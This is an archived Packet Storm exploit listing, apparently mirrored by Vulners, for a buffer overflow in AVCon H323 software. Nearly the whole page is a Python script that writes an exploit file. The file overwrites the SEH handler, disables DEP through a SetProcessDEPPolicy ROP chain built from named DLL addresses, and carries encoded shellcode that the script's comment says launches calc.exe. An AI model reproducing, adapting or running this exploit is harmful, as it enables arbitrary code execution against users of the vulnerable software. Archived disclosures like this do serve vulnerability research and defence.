Search...

AVCon Buffer Overflow With DEP Bypass

2011-09-21T00:00:00
ID PACKETSTORM:105252
Type packetstorm
Reporter Blake
Modified 2011-09-21T00:00:00

Description

                                        
                                            `# DEP Bypass for OptIn/OptOut  
# all modules used are not aslr aware  
# script produces a text file, copy the contents  
# paste in the input field next to the call button  
# discovered by Dillon Beresford  
  
import sys  
from struct import pack  
  
print "\n====================="  
print "AVCon H323 DEP Bypass"  
print " Written by Blake "  
print " Tested on XP SP3 "  
print "=====================\n"  
  
# around 619 bytes of space before seh overwrite  
# if more space is needed, around 2263 bytes after seh overwrite  
# calc.exe  
shellcode =(  
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"  
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"  
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"  
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"  
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"  
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"  
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"  
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"  
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"  
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"  
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"  
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"  
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"  
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"  
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"  
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"  
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"  
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"  
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"  
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"  
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"  
"\x4e\x46\x43\x36\x42\x50\x5a")  
  
# SetProcessDEPPolicy ROP Chain  
seh = pack('<L',0x1001414a) # {pivot 2072} # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,814 # RETN ** [avnmc2.dll]  
rop_nop = "\x41" * 3 # needed to align rop nop  
rop_nop += pack('<L',0x10024c43) * 90 # RETN - avnmc2.dll  
rop = pack('<L',0x20047e99) # POP EBX, RETN - HikPlayM4.dll  
rop += "\xff\xff\xff\xff"  
rop += pack('<L',0x6de13c78) # INC EBX # RETN 00 ** [xish264.dll]  
rop += pack('<L',0x6ddc48e4) # POP EBP, RETN - xish264.dll   
rop += pack('<L',0x7c8622a4) # SetProcessDEPPolicy - XP SP3  
rop += pack('<L',0x20050f44) # POP EDI, RETN - HikPlayM4.dll  
rop += pack('<L',0x20050f45) # RETN  
rop += pack('<L',0X20014DE1) # POP ESI, RETN  
rop += pack('<L',0x20050f45) # RETN  
rop += pack('<L',0x10016d22) # PUSHAD # RETN ** [avnmc2.dll]  
  
nops = "\x90" * 20  
junk = "\x43" * 5000  
buffer = "\x41" * (1023 - len(rop_nop + rop + nops + shellcode)) # SEH overwritten at 1023  
  
print "[+] Creating file"  
try:  
file = open("exploit.txt","w")  
file.write(rop_nop + rop + nops + shellcode + buffer + seh + junk)  
file.close()  
print "[+] File created"  
except:  
print "[X] Error creating file!"  
  
raw_input("[+] Press any key to exit\n")  
  
  
`
JSON Vulners Source
Initial Source


All product names, logos, and brands are property of their respective owners. All company, product and service names used in this website are for identification purposes only. Use of these names, logos, and brands does not imply endorsement.If you are an owner of some content and want it to be removed, please mail to content@vulners.com Vulners, 2017
Protected by